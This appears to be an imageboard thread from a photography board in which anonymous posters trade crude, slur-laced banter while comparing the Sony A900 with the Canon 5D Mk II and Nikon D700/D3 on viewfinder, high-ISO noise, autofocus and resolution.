Yup, this is a A900 thread Anonymous
So, now that this thing is out for market, is there a owner on /p/ that could give us his/her thoughts and feedback?

please kindly avoid trolls and canokony faggotery.
>> Anonymous
What do you want it for? Are you seriously planning a purchase?
>> Anonymous
well, it´s supposed to have the best viewfinder on teh marketh
>> Anonymous
>>287607
The best viewfinder won't provide you the best pictures, faggot. It still depends on how well you perceive the world using a camera, and noise at ISO 1600 is fucked up. It just makes an ugly picture at 24 megapickles.
>> Anonymous
There are dozens of camera review sites that will provide far more information than anything you could get on /p/ right now. Don't waste your time here.

i´m sorry, but how often - per day - did your mom drop you on your head when you were a small child?

i just said that it´s supposed to have the best viewfinder on the market, NOTHING ELSE.

see, just like "water is not poison" to which you would reply "IT DASNT TAIST AZ GUD AS COLA BIETCH"

noise is high at iso1600 indeed, but most people will rarely need that much anyway. the only ones i can see are sport-reporters and allright, so it´s not the right cam for them, but for a lot of other people it definitively can/will be.

Here's OP.
True, but I want the opinion of ordinary people actually owning and using it, not the one of some pros that dissects dozens of cameras per year.

Of course they could provider a comparative run, it's still interesting, but I rather have the opinion of people that own the thing for themselves not people that are paid to have it for 1-2 months, write a paper and give it back liking it or not.

How about people who go to parties where the host doesn't light it with floodlights? Or who want to take pictures outside after dusk without using a tripod or flash?

The ability to shoot a clean ISO1600 is the main reason I want a 5D Mk II.

I'm going to go ahead and review it rockwell style. Having never used it of course.

A900 is a good camera if you like to take pictures of things during the daytime and you want really really big prints cause obviously megapickels is better for things like that. Don't take this camera out at night because I hear the noise can band together and form guerrilla pixels. Guerrilla pixels are the leading cause of dead pixels and brain cancer.
Please be carefull when using such sophisticated equipment! with great megapickels comes great responsibility or something like that.

To be honest, anyone considering buying a professional level camera should not need to ask the basics about it here. If you have to ask then you shouldn't be buying it. These would be beyond your requirements and skill level.

>Now can you do the exact same thing with the D700/D3 and 5DMk2 ?
Biggest issue I've heard about so far with the 5DII is the AF system. Its AF is actually *worse* than the AF on the 40D and 50D. 9 point AF like the x0D, but the same size, not stretched out to account for the larger frame (so the 9 points are all squozen into the middle). Additionally, only the center point is cross-type, whereas the 40D and 50D both have all cross-type sensors.

I've no idea what the Alpha's AF system is like, but my assumption is that it's better.

or just use a D3 for all... i might be biting the bullet and getting one next week.

>>289168or just use a D3 for all

if i'm staying my ass in studio, i want my 21 megapickles
>> Jeremo !iKGMr61IHM
>>289170

with that logic, why bother with 35mm equiv? Just move onto Medium Format.

I still think that the 21MP is over played, unless of course you print massively (bigger than A0) which would again reinforce my statement on MF.

But Like i said, i'm still wanting for a conclusive review where the 21MP is shown to be at a clear advantage over the Nikon's 12MP, that's the make or break decision for me.
>> Anonymous
because it costs a fraction of MF?

because i can actually take it outside and use it in a sensible fashion?

because resolution at this level actually does help in picking up more detail?

Yeah, but you also said this

Not that im saying you're flip flopping, just saying the Nikon are great in this respect too, infact better. Legendary Nikon weather seal, hammer nails yadda yaddda yadda.

>>because resolution at this level actually does help in picking up more detail?

Yeah you see, that's what I want to know for sure, there simply isn't any conclusive evidence and reviews yet that says the Canon's 21MP picks up more detail.
>> Anonymous
>>289174
It won't pick up too many details when the NR smudges them all out.

What the fuck are you doing in a thread about the A900 and what the hell were you talking about?
>> Anonymous
>>289184Yeah you're just being a knob now, your first statement implied you stayed in the studio at all times.

the choice was between a D700, D3 or 5D II, i would prefer a 5D II because i do more studio and have no need for 51 AF points

you're the one who brought up MF as a better substitute, so i told you it's not as practical if i need to take it outside because apparently i can't take a camera outside now

>>289184I would more likely than not be put off by the horrendous AF performance that's been hyped about.

a 1Ds is not a 1D

>>289185What the fuck are you doing in a thread about the A900 and what the hell were you talking about?

>>289184
>I would more likely than not be put off by the horrendous AF performance that's been hyped about.

The AF issues have been fixed in the 1Ds, so if you were to go and buy a new one, you should see no problems with the AF at all.
>> Anonymous
A900 has the best in class resolution and dynamic range at low iso. High iso is not the best but you can down res to 12 mp and noise is only about 1/2 stop worse than D3.

My opinion: low iso, get A900. High iso, get D700. Video, get 5d11.
